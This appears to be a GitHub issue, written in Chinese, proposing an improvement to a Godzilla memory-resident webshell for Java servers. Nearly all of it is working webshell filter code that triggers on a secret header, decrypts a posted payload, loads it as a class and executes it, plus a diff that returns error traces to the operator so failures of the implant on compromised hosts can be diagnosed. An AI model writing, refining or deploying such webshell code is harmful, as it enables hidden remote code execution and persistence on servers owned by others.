[优化]哥斯拉马回显运行错误日志 #100
Description
目前哥斯拉马,在运行前运行错误不会回显任何日志,例如 session 拿不到,无法通过响应得知
try {
if (request.getHeader(headerName) != null && request.getHeader(headerName).contains(headerValue)) {
HttpSession session = request.getSession();
byte[] data = base64Decode(request.getParameter(pass));
data = this.x(data, false);
Object cache = session.getAttribute(key);
if (cache == null) {
session.setAttribute(key, (new GodzillaFilter(Thread.currentThread().getContextClassLoader())).Q(data));
} else {
ByteArrayOutputStream arrOut = new ByteArrayOutputStream();
Object f = ((Class<?>) cache).newInstance();
f.equals(arrOut);
f.equals(request);
f.equals(data);
f.toString();
response.getWriter().write(md5.substring(0, 16));
response.getWriter().write(base64Encode(this.x(arrOut.toByteArray(), true)));
response.getWriter().write(md5.substring(16));
}
return;
}
} catch (Throwable e) {
e.printStackTrace();
}改为如下,将运行错误的日志,直接对接 response.getWriter() 传到客户端,这样能识别内存马的兼容性问题。
try {
if (request.getHeader(headerName) != null && request.getHeader(headerName).contains(headerValue)) {
+ try {
HttpSession session = request.getSession();
byte[] data = base64Decode(request.getParameter(pass));
data = this.x(data, false);
Object cache = session.getAttribute(key);
if (cache == null) {
session.setAttribute(key, (new GodzillaFilter(Thread.currentThread().getContextClassLoader())).Q(data));
} else {
ByteArrayOutputStream arrOut = new ByteArrayOutputStream();
Object f = ((Class<?>) cache).newInstance();
f.equals(arrOut);
f.equals(request);
f.equals(data);
f.toString();
response.getWriter().write(md5.substring(0, 16));
response.getWriter().write(base64Encode(this.x(arrOut.toByteArray(), true)));
response.getWriter().write(md5.substring(16));
}
return;
+ }catch (Throwable e) {
+ e.printStackTrace(response.getWriter());
+ }
}
} catch (Throwable e) {
e.printStackTrace();
}